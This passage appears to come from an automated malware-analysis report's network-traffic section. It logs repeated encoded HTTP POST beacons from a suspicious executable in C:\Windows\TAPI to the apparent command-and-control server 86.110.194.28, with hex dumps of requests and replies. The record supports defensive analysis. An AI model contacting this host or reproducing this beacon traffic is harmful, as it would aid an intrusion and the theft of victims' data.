                                                                                                                                                                        Data Ascii: [R^XX]U]T[YZ[UWS_QZXRQPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>Z#9$R&Z,=Z''6&*6$)U#;<\$9'/#(#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:57:44.942687035 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:45.072609901 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:44 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.44974286.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:45.363059044 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:57:45.715049982 CET2516OUTData Raw: 5b 51 5e 59 58 5c 50 5c 54 5b 59 5a 5b 51 57 53 5f 54 5a 5e 52 5d 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q^YX\P\T[YZ[QWS_TZ^R]PGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>]!:<T1/3*Z$:2?>"* + 'A$/)9#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:57:46.088067055 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:46.215472937 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:45 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.44974486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:48.095732927 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2000
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:57:48.449249029 CET2000OUTData Raw: 5b 53 5e 50 58 5e 55 5d 54 5b 59 5a 5b 51 57 5e 5f 57 5a 5c 52 52 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^PX^U]T[YZ[QW^_WZ\RRPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%)>"#*0R2$=+3$!Z1Y>"4!+,X$:4D3,$T()#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:57:48.795454025 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:48.928992033 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:48 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 27 01 25 2b 07 05 3e 3f 3b 5f 26 55 31 1c 35 33 3c 14 38 09 26 06 23 2c 2a 07 27 38 3c 57 3c 3d 35 18 3f 33 26 08 23 3d 3d 1d 3f 30 28 5d 03 10 39 58 28 04 33 59 3e 3e 35 5d 2d 19 3b 5f 27 24 34 1f 2a 33 25 54 31 3f 36 54 20 3d 09 53 2a 20 2e 01 30 15 0a 14 3c 0e 30 07 27 2d 20 54 0b 17 27 1c 27 30 24 06 31 38 0b 11 3e 51 24 5d 30 03 3d 19 22 5a 2e 51 34 07 05 02 38 30 2d 54 25 28 21 11 3d 00 20 0a 26 5c 22 5b 33 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: '%+>?;_&U153<8&#,*'8<W<=5?3&#==?0(]9X(3Y>>5]-;_'$4*3%T1?6T =S* .0<0'- T''0$18>Q$]0="Z.Q480-T%(!= &\"[3;.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.44974586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:51.262942076 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:57:51.621124983 CET2516OUTData Raw: 5b 55 5e 5a 5d 5d 50 5b 54 5b 59 5a 5b 5e 57 5b 5f 55 5a 58 52 5d 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [U^Z]]P[T[YZ[^W[_UZXR]PFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&+#*8W&? B>;']12 4.48<[09'3,3+#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:57:51.965153933 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:52.082788944 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:51 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.44974686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:52.722907066 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.44974786.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:53.855545044 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:57:54.214878082 CET2516OUTData Raw: 5b 51 5b 5b 58 5d 55 5d 54 5b 59 5a 5b 51 57 5a 5f 55 5a 59 52 52 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q[[X]U]T[YZ[QWZ_UZYRRPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C).![6*U&,E>.0$>&?S!45W!8'0 '?3))#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:57:54.353739023 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:54.492264986 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:54 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T
                                                                                                                                                                        Jan 3, 2025 07:57:54.708081007 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:54 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        9192.168.2.44974986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:54.332926035 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2000
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:57:54.684022903 CET2000OUTData Raw: 5b 53 5e 5b 58 5a 55 5f 54 5b 59 5a 5b 52 57 5a 5f 54 5a 58 52 53 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^[XZU_T[YZ[RWZ_TZXRSPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(65$&?=+)'5\2?6V#,]$)(D3,??9#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:57:55.060072899 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:55.196461916 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:54 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 27 02 32 05 2e 1e 28 2c 2f 13 26 30 3d 5e 21 30 3c 5c 2f 0e 25 19 36 2f 26 02 32 28 30 1e 28 2d 25 1a 3f 0d 26 0c 23 2e 3d 52 29 30 28 5d 03 10 3a 02 3f 5b 37 59 2a 10 39 59 3a 37 3b 5a 33 37 01 04 2b 30 26 09 26 2c 29 0e 22 3e 33 57 3d 20 3e 02 24 05 24 16 3c 09 2f 5f 25 2d 20 54 0b 17 27 56 33 23 20 01 26 01 22 04 2a 24 24 5d 24 04 26 0b 23 2c 3e 57 34 17 20 18 2f 20 0b 56 27 06 08 0b 29 10 02 0b 26 04 3e 11 26 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: '2.(,/&0=^!0<\/%6/&2(0(-%?&#.=R)0(]:?[7Y*9Y:7;Z37+0&&,)">3W= >$$</_%- T'V3# &"*$$]$&#,>W4 / V')&>&+.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        10192.168.2.44975086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:55.435126066 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:57:55.792983055 CET2516OUTData Raw: 5b 55 5e 5a 58 57 55 5a 54 5b 59 5a 5b 5e 57 5a 5f 54 5a 54 52 53 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [U^ZXWUZT[YZ[^WZ_TZTRSPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C).^!$%Z;)Y07&'/5$5W7094B3?T<#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:57:55.801687002 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:56.012303114 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:55 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        11192.168.2.44975186.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:56.450413942 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:57:56.808628082 CET2516OUTData Raw: 5b 5c 5e 5f 5d 5b 55 5a 54 5b 59 5a 5b 5f 57 5e 5f 5c 5a 58 52 55 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\^_][UZT[YZ[_W^_\ZXRUP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%)>2#*0R&<**[3:2="=#(Y3_+&?S(#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:57:57.143516064 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:57.277714014 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:57 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        12192.168.2.44975386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:59.281563997 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:57:59.636800051 CET2516OUTData Raw: 5e 55 5b 58 5d 59 50 58 54 5b 59 5a 5b 5f 57 59 5f 50 5a 5b 52 52 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^U[X]YPXT[YZ[_WY_PZ[RRPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<1\#:<U%Z#>;2Y'&Y9!!P#+,Y%:;$<+#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:57:59.959013939 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:00.090744019 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:59 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        13192.168.2.44975486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:00.205971956 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2000
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        14192.168.2.44975586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:00.320075989 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:00.667983055 CET2516OUTData Raw: 5b 50 5b 5c 58 5e 50 58 54 5b 59 5a 5b 50 57 59 5f 54 5a 54 52 56 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P[\X^PXT[YZ[PWY_TZTRVPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?"5\/%<,>;X$7=Z&/"")P70%*#3/(S?#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:01.016110897 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:01.146109104 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:00 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        15192.168.2.44975686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:02.025249958 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:02.371134043 CET2516OUTData Raw: 5e 50 5e 5b 5d 5e 50 5d 54 5b 59 5a 5b 55 57 5e 5f 54 5a 5e 52 55 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P^[]^P]T[YZ[UW^_TZ^RUP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?=*"\8S2 @(8607!Y'?&5'!4(<Z$)+$,'(#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:58:02.703752995 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:02.830867052 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:02 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        16192.168.2.44975886.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:02.995456934 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2512
                                                                                                                                                                        Expect: 100-continue
